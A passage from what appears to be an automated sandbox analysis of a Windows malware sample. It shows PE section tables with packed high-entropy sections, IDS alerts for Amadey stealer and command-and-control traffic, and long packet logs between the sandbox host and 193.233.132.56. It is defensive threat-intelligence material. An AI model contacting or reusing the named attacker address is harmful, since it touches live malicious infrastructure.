| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x68000 | 0x2ea00 | 43193df2ce84e9bcc4beed8ab2540838 | False | 0.9981358914209115 | data | 7.982348024472177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x69000 | 0x1e0 | 0x200 | 12eed034bda0720160281fe0e21c3acd | False | 0.580078125 | data | 4.521170698244857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x6a000 | 0x1000 | 0x200 | 17662c92043abde8b4b3074dcc401ca6 | False | 0.1484375 | data | 1.0249469107790772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| qatcqnjl | 0x6b000 | 0x2ad000 | 0x2aca00 | edc4095cef7156abadb967fad510a923 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| zabsvnpb | 0x318000 | 0x1000 | 0x400 | cb767287f5d0e687cd9747fcdf4fb490 | False | 0.8095703125 | data | 6.358319582684511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x319000 | 0x3000 | 0x2200 | 51733941ad0bca5ffca8ce865ec10fc3 | False | 0.06158088235294118 | DOS executable (COM) | 0.7638928624802979 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x317718 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 04/19/24-04:26:07.803129 | TCP | 2855239 | ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) | 49742 | 80 | 192.168.2.4 | 193.233.132.56 |
| 04/19/24-04:26:03.920797 | TCP | 2856147 | ETPRO TROJAN Amadey CnC Activity M3 | 49735 | 80 | 192.168.2.4 | 193.233.132.56 |
| 04/19/24-04:26:08.422562 | TCP | 2856151 | ETPRO TROJAN Amadey CnC Activity M7 | 49744 | 80 | 192.168.2.4 | 193.233.132.56 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                    Apr 19, 2024 04:26:04.672390938 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672400951 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672430038 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672434092 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672467947 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672475100 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672507048 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672512054 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672545910 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672553062 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672585011 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672589064 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672625065 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672631025 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672665119 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672668934 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672704935 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672710896 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672744989 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672749996 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672785997 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672789097 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672823906 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672828913 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672863960 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672869921 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672900915 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672907114 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672941923 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.672946930 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672976017 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.672980070 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.673023939 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.673028946 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.673063040 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.673070908 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.673110962 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.763921022 CEST8049735193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.764107943 CEST4973580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.765613079 CEST8049737193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.765682936 CEST4973780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.765908003 CEST4973780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922132015 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922174931 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922193050 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922214031 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922233105 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922251940 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922270060 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922286987 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922308922 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922339916 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922354937 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922373056 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922384024 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922405958 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922414064 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922427893 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922431946 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922450066 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922462940 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922468901 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922483921 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922487974 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922504902 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922508001 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922516108 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922535896 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922558069 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922569990 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922588110 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922605991 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922616005 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922625065 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922633886 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922643900 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922657967 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922662020 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922677040 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922681093 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922697067 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922699928 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922719955 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922719955 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922739029 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922739029 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922756910 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922758102 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922770977 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922777891 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922790051 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922797918 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922810078 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922817945 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922830105 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922847986 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922856092 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922867060 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922878981 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922903061 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922904015 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922921896 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922923088 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922941923 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922944069 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922962904 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922969103 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.922982931 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.922986984 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923007965 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923008919 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923027992 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923028946 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923049927 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923055887 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923073053 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923078060 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923093081 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923099995 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923113108 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923118114 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923132896 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923135042 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923150063 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923151016 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923172951 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923192024 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923207045 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923226118 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923243046 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923253059 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923260927 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923274040 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923280954 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923290968 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923304081 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923310995 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923329115 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923345089 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923348904 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923367977 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923386097 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923389912 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923404932 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923410892 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923424959 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923429966 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923444986 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923445940 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923464060 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923469067 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923482895 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923492908 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923502922 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923505068 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923522949 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923526049 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923542023 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923547029 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923558950 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923562050 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923580885 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923588991 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923599005 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:04.923608065 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.923619032 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174524069 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174529076 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174544096 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174549103 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174563885 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174576044 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174582958 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174602032 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174602032 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174619913 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174626112 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174638033 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174650908 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174655914 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174663067 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174675941 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174680948 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174695969 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174700022 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174725056 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174731970 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174745083 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174750090 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174763918 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174767017 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174782991 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174798012 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174803972 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174812078 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174823999 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174829960 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174844027 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174854994 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174861908 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174880028 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174885988 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174897909 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174897909 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174916983 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174926043 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174936056 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174951077 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174954891 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174968004 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174973011 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174979925 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.174990892 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.174999952 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175010920 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175014973 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175029039 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175034046 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175048113 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175049067 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175067902 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175067902 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175086975 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175087929 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175106049 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175107002 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175123930 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175132036 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175142050 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175151110 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175162077 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175173044 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175180912 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175199032 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175199986 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175218105 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175225973 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175240040 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.175244093 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175267935 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.175286055 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.258111000 CEST8049737193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.262514114 CEST8049737193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.262584925 CEST4973780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.378540039 CEST4973780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.378842115 CEST4973980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.420655012 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.420685053 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.420703888 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.420723915 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.420743942 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.420927048 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423432112 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423461914 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423482895 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423501968 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423527002 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423540115 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423552990 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423572063 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423589945 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423618078 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423628092 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423644066 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423649073 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423666954 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423669100 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423692942 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423703909 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423707008 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423727036 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423762083 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423779011 CEST8049736193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:26:05.423782110 CEST4973680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:26:05.423801899 CEST4973680192.168.2.4193.233.132.56
